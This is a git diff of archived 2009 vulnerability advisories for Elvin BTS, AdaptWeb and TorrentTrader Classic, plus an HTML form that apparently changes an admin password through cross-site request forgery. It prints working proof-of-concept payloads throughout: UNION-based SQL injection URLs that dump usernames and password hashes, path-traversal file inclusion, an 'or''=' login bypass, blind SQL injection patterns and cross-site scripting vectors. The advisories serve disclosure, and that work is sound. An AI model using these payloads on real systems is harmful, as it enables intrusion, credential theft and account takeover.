@@ -1,130 +1,130 @@ -################################################################################################################# -[+] Elvin BTS 1.2.0 Multiple Remote VUlnerabilities -[+] Discovered By SirGod -[+] www.mortal-team.org -################################################################################################################# - -- Script Homepage : http://www.elvinbts.org/ -- Google Dork : Powered by Elvin Bug Tracking Server. - -Elvin BTS suffers from a lot of vunerabilities - -1) SQL Injection -2) Local File Inclusion -3) SQL Injection Login Bypass -4) Cross-Site Scripting -5) Cross-Site Request Forgery -6) Source Code Disclosure - - ------------------------ 1) SQL Injection ----------------------- - -- Vulnerable code is everywhere.I will present only 2 PoC's. - - a) Vulnerable code in show_bug.php - ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- -$query_bug = sprintf("SELECT * FROM " .$prefix_db. "_bug WHERE bg_id_pk=" .$_GET['id']. " AND bg_deleted_dt IS NULL"); ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- - - - PoC - - http://127.0.0.1/[path]/show_bug.php?id=null+union+all+select+1,2,3,4,concat_ws(0x3a,ac_user_vc,ac_pass_vc),6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+eb_profile-- - - b) Vulnerable code in show_activity.php - ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- -$query_activity = sprintf("SELECT * FROM " .$prefix_db. "_activity WHERE ay_bugid_fk=" .$_GET['id']. 
""); ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- - - - PoC - - http://127.0.0.1/[path]/show_activity.php?id=null+union+all+select+1,2,3,4,concat_ws(0x3a,ac_user_vc,ac_pass_vc),6,7,8+from+eb_profile-- - - ------------------------ 2) Local File Inclusion ----------------------- - -- Vulnerable code in page.php - - ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- -$filename = "pages/".$_GET['id']; -................................................ -if(file_exists($filename)){ -include($filename); -} else { -echo "

    Sorry page cannot be found!

    "; -} ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- - - - PoC - - http://127.0.0.1/[path]/page.php?id=../../../../../../BOOTSECT.BAK - - - ------------------------ 3) SQL Injection Login Bypass----------------------- - -- Code in login.php ( in login.php is included the vulnerable code) - ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- -include(LoadElvinModule('login.ei')); ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- - - -- Vulnerable code in inc/login.ei - ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- -$query_login = sprintf("SELECT * FROM " .$prefix_db. "_profile WHERE ac_user_vc='" .$_POST['inUser']. "' AND ac_pass_vc='" .$_POST['inPass']. "'"); ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- - - - PoC - -Login as : - - Username : 'or''=' - Password : 'or''=' - - ------------------------ 4) Cross-Site Scripting----------------------- - -It's more XSS's in the script,but tired to find them all. - -- Vulnerable code in show_activity.php - ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- -

    Back to bug #

    ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- - - - PoC - - http://127.0.0.1/[path]/show_activity.php?id= - - - ------------------------ 5) Cross-Site Request Forgery----------------------- - -Logout CSRF - - - PoC - - http://127.0.0.1/[path]/login.php?logout - - - ------------------------ 6) Source Code Disclosure----------------------- - -Go to /inc/ directory.You will se .ei files with php code inside. -That files are included and used by the script. - - - PoC's - - http://127.0.0.1/[path]/inc/login.ei - http://127.0.0.1/[path]/inc/jump_bug.ei - http://127.0.0.1/[path]/inc/create_account.ei - -Etc.. - -############################################### EOF ################################################## - -# milw0rm.com [2009-06-15] +################################################################################################################# +[+] Elvin BTS 1.2.0 Multiple Remote VUlnerabilities +[+] Discovered By SirGod +[+] www.mortal-team.org +################################################################################################################# + +- Script Homepage : http://www.elvinbts.org/ +- Google Dork : Powered by Elvin Bug Tracking Server. + +Elvin BTS suffers from a lot of vunerabilities + +1) SQL Injection +2) Local File Inclusion +3) SQL Injection Login Bypass +4) Cross-Site Scripting +5) Cross-Site Request Forgery +6) Source Code Disclosure + + +----------------------- 1) SQL Injection ----------------------- + +- Vulnerable code is everywhere.I will present only 2 PoC's. + + a) Vulnerable code in show_bug.php + +---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- +$query_bug = sprintf("SELECT * FROM " .$prefix_db. 
"_bug WHERE bg_id_pk=" .$_GET['id']. " AND bg_deleted_dt IS NULL"); +---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- + + - PoC + + http://127.0.0.1/[path]/show_bug.php?id=null+union+all+select+1,2,3,4,concat_ws(0x3a,ac_user_vc,ac_pass_vc),6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+eb_profile-- + + b) Vulnerable code in show_activity.php + +---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- +$query_activity = sprintf("SELECT * FROM " .$prefix_db. "_activity WHERE ay_bugid_fk=" .$_GET['id']. ""); +---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- + + - PoC + + http://127.0.0.1/[path]/show_activity.php?id=null+union+all+select+1,2,3,4,concat_ws(0x3a,ac_user_vc,ac_pass_vc),6,7,8+from+eb_profile-- + + +----------------------- 2) Local File Inclusion ----------------------- + +- Vulnerable code in page.php + + +---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- +$filename = "pages/".$_GET['id']; +................................................ +if(file_exists($filename)){ +include($filename); +} else { +echo "

    Sorry page cannot be found!

    "; +} +---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- + + - PoC + + http://127.0.0.1/[path]/page.php?id=../../../../../../BOOTSECT.BAK + + + +----------------------- 3) SQL Injection Login Bypass----------------------- + +- Code in login.php ( in login.php is included the vulnerable code) + +---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- +include(LoadElvinModule('login.ei')); +---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- + + +- Vulnerable code in inc/login.ei + +---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- +$query_login = sprintf("SELECT * FROM " .$prefix_db. "_profile WHERE ac_user_vc='" .$_POST['inUser']. "' AND ac_pass_vc='" .$_POST['inPass']. "'"); +---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- + + - PoC + +Login as : + + Username : 'or''=' + Password : 'or''=' + + +----------------------- 4) Cross-Site Scripting----------------------- + +It's more XSS's in the script,but tired to find them all. + +- Vulnerable code in show_activity.php + +---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- +

    Back to bug #

    +---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- + + - PoC + + http://127.0.0.1/[path]/show_activity.php?id= + + + +----------------------- 5) Cross-Site Request Forgery----------------------- + +Logout CSRF + + - PoC + + http://127.0.0.1/[path]/login.php?logout + + + +----------------------- 6) Source Code Disclosure----------------------- + +Go to /inc/ directory.You will se .ei files with php code inside. +That files are included and used by the script. + + - PoC's + + http://127.0.0.1/[path]/inc/login.ei + http://127.0.0.1/[path]/inc/jump_bug.ei + http://127.0.0.1/[path]/inc/create_account.ei + +Etc.. + +############################################### EOF ################################################## + +# milw0rm.com [2009-06-15] diff --git a/platforms/php/webapps/8954.txt b/platforms/php/webapps/8954.txt index 0042b6c40..95ab4b6a9 100755 --- a/platforms/php/webapps/8954.txt +++ b/platforms/php/webapps/8954.txt 
@@ -1,27 +1,26 @@ - -################################################################################################################# -[+] AdaptWeb 0.9.2 (LFI/SQL) Multiple Remote Vulnerabilities -[+] Script : http://adaptweb.sourceforge.net/ -[+] Discovered By SirGod -[+] www.mortal-team.org -################################################################################################################# - -[+] Script homepage : http://adaptweb.sourceforge.net/ - -[+] Local File Inclusion - -- PoC - - http://127.0.0.1/[path]/index.php?newlang=../../../../../../BOOTSECT.BAK%00 - - -[+] SQL Injection - -- PoC - - http://127.0.0.1/[path]/a_index.php?opcao=TopicosCadastro1&CodigoDisciplina=null+union+all+select+concat_ws(0x3a,senha_usuario,email_usuario)+from+usuario+where+id_usuario=1--&numtopico=1 - -################################################################################################################# - - -# milw0rm.com [2009-06-15] +################################################################################################################# +[+] AdaptWeb 0.9.2 (LFI/SQL) Multiple Remote Vulnerabilities +[+] Script : http://adaptweb.sourceforge.net/ +[+] Discovered By SirGod +[+] www.mortal-team.org +################################################################################################################# + +[+] Script homepage : http://adaptweb.sourceforge.net/ + +[+] Local File Inclusion + +- PoC + + http://127.0.0.1/[path]/index.php?newlang=../../../../../../BOOTSECT.BAK%00 + + +[+] SQL Injection + +- PoC + + http://127.0.0.1/[path]/a_index.php?opcao=TopicosCadastro1&CodigoDisciplina=null+union+all+select+concat_ws(0x3a,senha_usuario,email_usuario)+from+usuario+where+id_usuario=1--&numtopico=1 + +################################################################################################################# + + +# milw0rm.com [2009-06-15] 
diff --git a/platforms/php/webapps/8956.htm b/platforms/php/webapps/8956.htm index 87b01f00c..f70abfb52 100755 --- a/platforms/php/webapps/8956.htm +++ b/platforms/php/webapps/8956.htm @@ -1,38 +1,38 @@ - -
    -enter password to change it in admin :D
    -
    - - - - - - - - - - - -
    Password :
    - -
    - -
    -
    - -# milw0rm.com [2009-06-15] + +
    +enter password to change it in admin :D
    +
    + + + + + + + + + + + +
    Password :
    + +
    + +
    +
    + +# milw0rm.com [2009-06-15] diff --git a/platforms/php/webapps/8958.txt b/platforms/php/webapps/8958.txt index f0e1ac784..ad2610e5c 100755 --- a/platforms/php/webapps/8958.txt +++ b/platforms/php/webapps/8958.txt 
@@ -1,674 +1,674 @@ -[waraxe-2009-SA#074] - Multiple Vulnerabilities in TorrentTrader Classic 1.09 -=============================================================================== - -Author: Janek Vind "waraxe" -Date: 15. June 2009 -Location: Estonia, Tartu -Web: http://www.waraxe.us/advisory-74.html - - -Description of vulnerable software: -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ - -TorrentTrader is a feature packed and highly customisable PHP/MySQL Based -BitTorrent tracker. Featuring integrated forums and plenty of administration -options. Please visit www.torrenttrader.org for the support forums. - -http://sourceforge.net/projects/torrenttrader - - -List of found vulnerabilities -=============================================================================== - -1. Sql Injection vulnerability in "account-inbox.php" -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ - -Reasons: - 1. unsanitized user submitted parameter "origmsg" is used in sql query -Preconditions: - 1. attacker must be logged in as valid user - -Test: - -http://localhost/torrenttrader109/account-inbox.php?msg=1&receiver=waraxe&origmsg=foobar&delete=yes - -Result: "MYSQL Error has occurred!" - ------------------------------[source code start]------------------------------- -if ($msg) { - $msg = trim($msg); - - $res = mysql_query("SELECT id, acceptpms, notifs, email, UNIX_TIMESTAMP(last_access) as la FROM users WHERE username=".sqlesc($receiver).""); - $user = mysql_fetch_assoc($res); - if (!$user) - $message = "Username not found."; -... - - if ($origmsg && $delete == "yes") - mysql_query("DELETE FROM messages WHERE id=$origmsg") or sqlerr(); ------------------------------[source code end]--------------------------------- - - -2. Weak password generation algorithm in "account-recover.php" -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ - -Reasons: - 1. 
generated password is weak and can be easily bruteforced -Preconditions: - 1. attacker must know email address associated with target's account - -Torrenttrader contains password reseting functionality: - -http://localhost/torrenttrader109/account-recover.php - -Anyone can initiate password reset, only condition is, that target's email -address must be know. Torrenttrader will check email address and after successful -validation new, temporal password will be generated and sent to that email address. -Specific autogenerated password appears to be random number between 10000 and 50000, -so basically there can be only 40000 possible temporal passwords. It's easy to -write bruteforce script, which will try all possible password combinations. -This process can take couple of hours or more, but eventually the password will -be guessed and target account becomes compromised. - ------------------------------[source code start]------------------------------- -if ($HTTP_SERVER_VARS["REQUEST_METHOD"] == "POST") { - $email = trim($_POST["email"]); - if (!validemail($email)) { - $msg = "" . NOT_VAILD_EMAIL . ""; - $kind = "Error"; - } - else { - $res = mysql_query("SELECT * FROM users WHERE email=" . sqlesc($email) . " LIMIT 1"); - $arr = mysql_fetch_assoc($res); - - if (!$arr) { - $msg = "" . EMAIL_INVALID . ""; - $kind = "Error"; - } -... - if ($arr) { - $newpassword = rand(10000, 50000); - $md5pass = md5($newpassword); ------------------------------[source code end]--------------------------------- - - -3. Unauthorized database backup vulnerability in "backup-database.php" -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ - -Reasons: - 1. missing access control -Preconditions: - 1. mysqldump utility must be available - 2. gzip utility must be available - 3. target directory must be writable - 4. 
database name must be known in order to successfully guess archive filename - -Test: - -http://localhost/torrenttrader109/backup-database.php - -Resulting message: "Database backup successful, entry inserted into database." - ------------------------------[source code start]------------------------------- -system(sprintf( - 'mysqldump --opt -h %s -u %s -p%s %s | gzip > %s/%s/%s-%s-%s-%s.gz', - $host, - $user, - $pass, - $db, - getenv('DOCUMENT_ROOT'), - $backupdir, - $db, - $day, - $month, - $year - )); ------------------------------[source code end]--------------------------------- - -Attacker is able to create database backup and resulting "gz" archive's -filename can be guessed, if attacker knows database name. This file is also -directly downloadable from website. Example download URI: - -http://localhost/torrenttrader109/backups/torrenttrader109-10-06-2009.gz - -As result information leakage exists. For example, attacker can fetch admin -credentials from backed up database. - - -4. Sql Injection vulnerability in "browse.php" -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ - -Reasons: - 1. uninitialized variable "wherecatin" is used in sql query -Preconditions: - 1. none - -Test: - -http://localhost/torrenttrader109/browse.php?wherecatin=waraxe - -Result: - -Unknown column 'waraxe' in 'where clause' - ------------------------------[source code start]------------------------------- -if (count($wherecatina) > 1) -$wherecatin = implode(",",$wherecatina); -elseif (count($wherecatina) == 1) -$wherea[] = "category = $wherecatina[0]"; -... -if ($wherecatin) -$where .= ($where ? " AND " : "") . "category IN(" . $wherecatin . ")"; - -if ($where != "") -$where = "WHERE $where"; - -$res = mysql_query("SELECT COUNT(*) FROM torrents $where") or die(mysql_error()); ------------------------------[source code end]--------------------------------- - -This specific sql injection vulneraility can be exploited using blind attack -methods. 
If there is one or more active torrents in database, then usable is -attack pattern below: - -http://localhost/torrenttrader109/browse.php?wherecatin=0)+OR+IF(LENGTH(@@version)>1,1,2)=(SELECT+1 - -and we see found torrents. - -http://localhost/torrenttrader109/browse.php?wherecatin=0)+OR+IF(LENGTH(@@version)>50,1,2)=(SELECT+1 - -"No torrents were found based on your search criteria." - -In this way attacker is able to ask boolean questions from database and retrieve -needed information bit by bit - example of classical blind sql injection. - -If there is no active torrents in database, then induced sql errors method can be used. - -http://localhost/torrenttrader109/browse.php?wherecatin=0)+OR+IF(LENGTH(@@version)>1,(SELECT 1 UNION ALL SELECT 1),2)=(SELECT+1 - -"Subquery returns more than 1 row" - -http://localhost/torrenttrader109/browse.php?wherecatin=0)+OR+IF(LENGTH(@@version)>50,(SELECT 1 UNION ALL SELECT 1),2)=(SELECT+1 - -"No torrents were found based on your search criteria." - - -5. Information leakage in "check.php" -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ - -Reasons: - 1. missing access control -Preconditions: - 1. none - -Test: - -http://localhost/torrenttrader109/check.php - -This script is originally meant to be used by installer and lately by admins. -Because of lacking access control attacker is able to use it for gathering some -useful information about target system - full path to webroot, file and directory -permissions of specific files, couple of php settings. - -6. Sql Injection vulnerability in "delreq.php" -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ - -Reasons: - 1. unsanitized user submitted parameter "categ" is used in sql query -Preconditions: - 1. attacker must have at least super moderator privileges (user class > 3) -Comments: - 1. 
very easy to exploit - -Test: - -http://localhost/torrenttrader109/delreq.php?categ=waraxe - -Result: - -You have an error in your SQL syntax; check the manual that corresponds to your -MySQL server version for the right syntax to use near -'waraxe order by requests.request LIMIT 0,50' at line 1 - -Test 2: - -http://localhost/torrenttrader109/delreq.php?categ=UNION+ALL+SELECT+1,2,3,4,5,username,password,email+FROM+users--+ - -and we can see all usernames, password hashes and emails from database. - - -7. Sql Injection vulnerability in "index.php" -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ - -Reasons: - 1. unsanitized user submitted parameter "choice" is used in sql query -Preconditions: - 1. attacker must be logged in as valid user - 2. there must exist at least one poll - -Testing needs custom written html form: -------------------------------------------------------------------------------- -
    -
    - - -
    -------------------------------------------------------------------------------- - -Result: "MYSQL Error has occurred!" - ------------------------------[source code start]------------------------------- -if ($_SERVER["REQUEST_METHOD"] == "POST") -{ - $choice = $_POST["choice"]; - if ($CURUSER && $choice != "" && $choice < 256 && $choice == floor($choice)) - { - $res = mysql_query("SELECT * FROM polls ORDER BY added DESC LIMIT 1") or sqlerr(); - $arr = mysql_fetch_assoc($res) or die("No poll"); - $pollid = $arr["id"]; - $userid = $CURUSER["id"]; - $res = mysql_query("SELECT * FROM pollanswers WHERE pollid=$pollid && userid=$userid") or sqlerr(); - $arr = mysql_fetch_assoc($res); - if ($arr) die("Dupe vote"); - mysql_query("INSERT INTO pollanswers VALUES(0, $pollid, $userid, $choice)") or sqlerr(); ------------------------------[source code end]--------------------------------- - - -8. Sql Injection vulnerability in "modrules.php" -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ - -Reasons: - 1. unsanitized user submitted parameter "id" is used in sql query -Preconditions: - 1. attacker must have at least moderator privileges - -Testing needs custom written html form: -------------------------------------------------------------------------------- -
    -
    - - - - - - -
    -------------------------------------------------------------------------------- - -Test result: "MYSQL Error has occurred!" - ------------------------------[source code start]------------------------------- -elseif ($_GET["act"]=="edited"){ -$id = $_POST["id"]; -$title = sqlesc($_POST["title"]); -$text = sqlesc($_POST["text"]); -$public = sqlesc($_POST["public"]); -$class = sqlesc($_POST["class"]); -mysql_query("update rules set title=$title, text=$text, public=$public, - class=$class where id=$id") or sqlerr(__FILE__,__LINE__); ------------------------------[source code end]--------------------------------- - - -9. Information leakage in "phpinfo.php" -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ - -Reasons: - 1. missing access control -Preconditions: - 1. none - -Test: - -http://localhost/torrenttrader109/phpinfo.php - ------------------------------[source code start]------------------------------- - ------------------------------[source code end]--------------------------------- - -This script can be used by attacker to obtain information from php function -phpinfo(). Access to such script must be limited to admins, but currently there -is not any access control at all. - - -10. Sql Injection vulnerabilities in "report.php" -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ - -Reasons: - 1. unsanitized user submitted parameter "user" is used in sql query - 2. unsanitized user submitted parameter "torrent" is used in sql query - 3. unsanitized user submitted parameter "forumid" is used in sql query - 4. unsanitized user submitted parameter "forumpost" is used in sql query -Preconditions: - 1. attacker must be logged in as valid user - -Two proof-of-concept tests below are using parameter "user". - -Test 1 needs custom written html form: -------------------------------------------------------------------------------- -
    -
    - - - -
    -------------------------------------------------------------------------------- - -Test result: "MYSQL Error has occurred!" - -Test 2 needs custom written html form: ------------------------------[source code start]------------------------------- -
    -
    - - - -
    ------------------------------[source code end]--------------------------------- - -Test result: "You have already reported user ..." - -It's classical blind sql injection exploitation method and allows attacker to -fetch information from database bit by bit by asking boolean questions. - -Other three sql injection vulnerabilities in "report.php" involve user submitted -parameters "torrent", "forumid" and "forumpost" and exploitation can be done in -similar way as seen above. - - -11. Sql Injection vulnerability in "take-deletepm.php" -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ - -Reasons: - 1. unsanitized user submitted parameter "delmp" is used in sql query -Preconditions: - 1. attacker must have admin privileges - ------------------------------[source code start]------------------------------- -if(isset($_POST["delmp"])) { - $do="DELETE FROM messages WHERE id IN (" . implode(", ", $_POST[delmp]) . ")"; - $res=mysql_query($do) ------------------------------[source code end]--------------------------------- - - -12. Sql Injection vulnerability in "takedelreport.php" -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ - -Reasons: - 1. unsanitized user submitted parameter "delreport" is used in sql query -Preconditions: - 1. attacker must have at least moderator privileges - ------------------------------[source code start]------------------------------- -jmodonly(); - -$res = mysql_query ("SELECT id FROM reports WHERE dealtwith=0 - AND id IN (" . implode(", ", $_POST[delreport]) . ")"); ------------------------------[source code end]--------------------------------- - - -13. Sql Injection vulnerability in "takedelreq.php" -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ - -Reasons: - 1. unsanitized user submitted parameter "delreq" is used in sql query -Preconditions: - 1. 
attacker must be logged in as valid user - ------------------------------[source code start]------------------------------- -if (get_user_class() > UC_JMODERATOR){ -... -$do="DELETE FROM requests WHERE id IN (" . implode(", ", $_POST[delreq]) . ")"; -$do2="DELETE FROM addedrequests WHERE requestid IN (" . implode(", ", $_POST[delreq]) . ")"; -$res2=mysql_query($do2); -$res=mysql_query($do); -... -} else { -foreach ($_POST[delreq] as $del_req){ -$delete_ok = checkRequestOwnership($CURUSER[id],$del_req); -if ($delete_ok){ -$do="DELETE FROM requests WHERE id IN ($del_req)"; -$do2="DELETE FROM addedrequests WHERE requestid IN ($del_req)"; -... -function checkRequestOwnership ($user, $delete_req){ -$query = mysql_query("SELECT * FROM requests WHERE userid=$user AND id = $delete_req") or sqlerr(); ------------------------------[source code end]--------------------------------- - - - -14. Sql Injection vulnerability in "takestaffmess.php" -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ - -Reasons: - 1. unsanitized user submitted parameter "clases" is used in sql query -Preconditions: - 1. attacker must have admin privileges - ------------------------------[source code start]------------------------------- -adminonly(); -... -$updateset = $_POST['clases']; - -$query = mysql_query("SELECT id FROM users WHERE class IN (".implode(",", $updateset).")"); ------------------------------[source code end]--------------------------------- - - -15. Sql Injection vulnerability in "takewarndisable.php" -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ - -Reasons: - 1. unsanitized user submitted parameter "warndisable" is used in sql query -Preconditions: - 1. attacker must have at least moderator privileges - ------------------------------[source code start]------------------------------- -jmodonly(); -... -if ($disable != '') { -$do="UPDATE users SET enabled='no' WHERE id IN (" . implode(", ", $_POST['warndisable']) . 
")"; -$res=mysql_query($do); -} - -if ($enable != '') { -$do = "UPDATE users SET enabled='yes' WHERE id IN (" . implode(", ", $_POST['warndisable']) . ")"; -$res = mysql_query($do); -} ------------------------------[source code end]--------------------------------- - - -16. Sql Injection vulnerability in "today.php" -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ - -Reasons: - 1. uninitialized variable "limit" is used in sql query -Preconditions: - 1. none -Comments: - 1. seems hard to exploit - -Test: - -http://localhost/torrenttrader109/today.php?limit=waraxe - -Result: - -"Warning: mysql_num_rows(): supplied argument is not a valid MySQL result -resource in C:\apache_wwwroot\torrenttrader109\today.php on line 21" - - -17. Sql Injection vulnerability in "torrents-details.php" -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ - -Reasons: - 1. uninitialized variable "where" is used in sql query -Preconditions: - 1. none - ------------------------------[source code start]------------------------------- -//speed mod -$resSpeed = mysql_query("SELECT seeders,leechers FROM torrents -WHERE $where visible='yes' and id = $id ORDER BY added DESC LIMIT 15") -or sqlerr(__FILE__, __LINE__); ------------------------------[source code end]--------------------------------- - -Exploitation is possible using blind sql injection methods. - -Test 1: - -http://localhost/torrenttrader109/torrents-details.php?id=1& -where=1=IF(LENGTH(@@version)>1,1,(SELECT+1+UNION+ALL+SELECT+1))--+ - -Result: normal page - -Test 2: - -http://localhost/torrenttrader109/torrents-details.php?id=1& -where=1=IF(LENGTH(@@version)>50,1,(SELECT+1+UNION+ALL+SELECT+1))--+ - -Result: "MYSQL Error has occurred!" - - -18. Sql Injection vulnerability in "admin-delreq.php" -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ - -Reasons: - 1. uninitialized variable "categ" is used in sql query -Preconditions: - 1. 
attacker must have at least moderator privileges - ------------------------------[source code start]------------------------------- -jmodonly(); -... -$res=mysql_query("SELECT users.username, requests.filled, requests.filledby, -requests.id, requests.userid, requests.request, requests.added, categories.name -as cat FROM requests inner join categories on requests.cat = categories.id -inner join users on requests.userid = users.id -$categ order by requests.request $limit") or print(mysql_error()); ------------------------------[source code end]--------------------------------- - -Test: - -http://localhost/torrenttrader109/admin-delreq.php?categ=waraxe - -Result: "You have an error in your SQL syntax; check the manual that corresponds -to your MySQL server version for the right syntax to use -near 'waraxe order by requests.request LIMIT 0,50' at line 1" - - -19. Persistent XSS in "viewrequests.php" -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ - -Reasons: - 1. unsanitized user submitted parameters used in response html generation -Preconditions: - 1. attacker must be logged in as valid user - -Steps for testing: - -a) attacker submits request: - -http://localhost/torrenttrader109/requests.php - -In "Title" field let's insert some javascript: - -testtitle - -b) admin will browse requests: - -http://localhost/torrenttrader109/viewrequests.php - -and previously planted javascript will be executed in admin session context. - - - -20. Persistent XSS in logging funtionality -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ - -Reasons: - 1. unsanitized user submitted parameters used in response html generation -Preconditions: - 1. 
attacker must be logged in as valid user - -Steps for testing: - -a) attacker uploads torrent file: - -http://localhost/torrenttrader109/torrents-upload.php - -In "Torrent Name" field let's insert some javascript: - -testname - -Upload is successful: "The torrent has been uploaded successfully!" - -b) admin will browse logs: - -http://localhost/torrenttrader109/admin.php?act=view_log - -and previously planted javascript will be executed in admin session context. - - -21. Local File Inclusion vulnerability in "backend/admin-functions.php" -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ - -Reasons: - 1. URI case-insensitivity on Windows platform -Preconditions: - 1. Windows platform - 2. register_globals=on - 3. magic_quotes_gpc=off - ------------------------------[source code start]------------------------------- -if (strpos($_SERVER['REQUEST_URI'], "admin-functions.php") !== false) die; -require_once("./themes/" . $GLOBALS['ss_uri'] . "/block.php"); ------------------------------[source code end]--------------------------------- - -As we can see from source code snippet above, direct access to script is blocked. -In case of Windows and Apache combination URI handling is case-insensitive. -In other hand "strpos()" function, used for access control, is case-sensitive. -So this script can be directly executed, if we change some characters in script's -filename to uppercase: - -http://localhost/torrenttrader109/backend/Admin-functions.php - -"Warning: require_once(./themes//block.php) [function.require-once]: -failed to open stream: No such file or directory in -C:\apache_wwwroot\torrenttrader109\backend\admin-functions.php on line 3" - -If "register_globals=on" and "magic_quotes_gpc=off", then LFI is possible: - -http://localhost/torrenttrader109/backend/Admin-functions.php?ss_uri=../../banners.txt%00 - - -22. 
Reflected XSS in multiple scripts -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ - -Examples: - -http://localhost/torrenttrader109/themes/default/footer.php?ttversion= -http://localhost/torrenttrader109/themes/default/header.php?SITENAME="> -http://localhost/torrenttrader109/themes/default/header.php?CURUSER[username]= -http://localhost/torrenttrader109/visitorstoday.php?todayactive= -http://localhost/torrenttrader109/visitorsnow.php?activepeople= -http://localhost/torrenttrader109/faq.php?faq_categ[999][title]=&faq_categ[999][flag]=1 -http://localhost/torrenttrader109/torrents-details.php?id=1&keepget="> - - -Greetings: -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ - -Greets to ToXiC, y3dips, Sm0ke, Heintz, slimjim100, pexli, mge, str0ke, -to all active waraxe.us forum members and to anyone else who know me! - - -Contact: -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ - -come2waraxe@yahoo.com -Janek Vind "waraxe" - -Waraxe forum: http://www.waraxe.us/forums.html -Personal homepage: http://www.janekvind.com/ ----------------------------------- [ EOF ] ------------------------------------ - -# milw0rm.com [2009-06-15] +[waraxe-2009-SA#074] - Multiple Vulnerabilities in TorrentTrader Classic 1.09 +=============================================================================== + +Author: Janek Vind "waraxe" +Date: 15. June 2009 +Location: Estonia, Tartu +Web: http://www.waraxe.us/advisory-74.html + + +Description of vulnerable software: 